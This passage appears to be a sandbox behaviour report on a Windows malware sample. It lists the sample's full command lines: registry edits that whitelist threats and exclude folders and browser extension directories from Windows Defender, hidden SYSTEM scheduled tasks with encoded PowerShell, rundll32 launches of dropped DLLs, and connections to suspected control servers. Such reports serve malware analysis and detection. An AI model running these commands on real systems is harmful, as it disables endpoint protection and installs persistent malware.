REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gyNyvcpze" /SC once /ST 01:28:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gyNyvcpze"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gyNyvcpze"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:50:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe\" y7 /eRxJdidez 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "WKALCIrwIEiqhKBsn"

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe y7 /eRxJdidez 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5904 -ip 5904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 1108

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\boZYqC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\sJDXIlv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\EfeJCiL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\sCKcxVb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\yxGEQFa.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\iXGtiDm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 01:04:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\aTaLVQIQ\yOpUncv.dll\",#1 /QNPbdidl 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QdCYtDviHOrgqJLgZ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\aTaLVQIQ\yOpUncv.dll",#1 /QNPbdidl 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\aTaLVQIQ\yOpUncv.dll",#1 /QNPbdidl 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5556 -ip 5556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5812 -ip 5812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 2304

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"

C:\Program Files (x86)\360\Total Security\PatchUp.exe

"C:\Program Files (x86)\360\Total Security\PatchUp.exe" /down_and_install=0

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
RU 185.215.113.67:40960 tcp
DE 185.172.128.33:8970 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 104.21.55.87:443 roomabolishsnifftwk.shop tcp
